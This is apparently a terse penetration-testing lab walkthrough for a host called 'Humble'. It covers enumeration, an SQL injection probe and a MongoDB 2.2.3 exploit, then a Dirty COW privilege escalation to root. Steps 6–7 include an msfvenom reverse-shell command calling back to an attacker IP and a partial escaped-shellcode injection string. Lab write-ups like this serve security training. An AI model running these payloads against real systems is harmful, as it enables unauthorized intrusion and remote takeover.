10.11.1.237 Humble) 1 🎍 10.11.1.237 (Humble) nmap shows that there are http and https, both show different webpages gobuster found sus directory /web1 on the https webpage, seems like it contains a user and hashed password 3. gobuster also found /test which allows user to search against the database which might be vulnerable to SQL injection 4. giving it a " ' " character made it throw an error, should be vuln to sql injection 5. it also gives the mongodb version 2.2.3, a google search reveals a potential reverse shell vulnerability https://www.exploit-db.com/exploits/24947 6. the exploit states that it requires a javascript payload in shellcode, used msfvenom generate payload msfvenom -p linux/x86/shell_reverse_tcp LHOST192.168.119.218 LPORT1234 CMD/bin/bash -f js_le -e generic/none 7. after 10000 years of modifying the payload, finally made it work (stuck on not removing the collection.find({'$where':' ) aaaa'; shellcode=unescape("%udb31%ue3f7%u4353%u6a53%u8902%ub0e1%ucd66%u9380%ub059%ucd3f%u4980%uf979%uc068%u77a8%u68da%u0002%ud204%ue189%u66 8. obtained reverse shell, mongodb 9. We realise that the kernel version is quite old, might be vuln to dirty cow 10.11.1.237 Humble) 2 (for debian distros, it was only fixed on 3.16.36 and the this machine's version is 3.2.0, so it should be vulnerable 10. Run dirtycow exploit and get root shell 11. get proof